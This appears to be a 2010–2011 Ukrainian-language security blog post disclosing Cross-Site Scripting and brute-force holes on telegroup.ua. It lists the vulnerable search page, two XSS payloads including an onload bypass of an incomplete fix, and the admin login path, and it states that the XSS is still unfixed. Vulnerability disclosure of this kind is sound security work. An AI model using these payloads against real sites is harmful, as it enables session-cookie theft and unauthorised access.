« Надійність SSL сертифікатів
Добірка уразливостей »

Уразливості на www.telegroup.ua

23:53 30.08.2011

10.11.2010

У липні, 25.07.2010, я знайшов Cross-Site Scripting та Brute Force уразливості на сайті http://www.telegroup.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

30.08.2011

XSS:

POST запит на сторінці http://www.telegroup.ua/ru/cms/search
“><script>alert(document.cookie)</script>
В полі пошуку.

Даний варіант атаки вже виправлено. Але неякісно, тому можна використати цей варіант:
“><body onload=alert(document.cookie)>

Brute Force:

http://www.telegroup.ua/admin/

BF уразливість вже виправлена, але XSS досі не виправлена.


This entry was posted on 23:53 30.08.2011 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

2 відповідей на “Уразливості на www.telegroup.ua”

  1. andre каже:
    П'ятниця, 12:34 12.11.2010

    thanks

  2. MustLive каже:
    П'ятниця, 14:10 12.11.2010

    andre

    Завжди будь ласка.

Leave a Reply

You must be logged in to post a comment.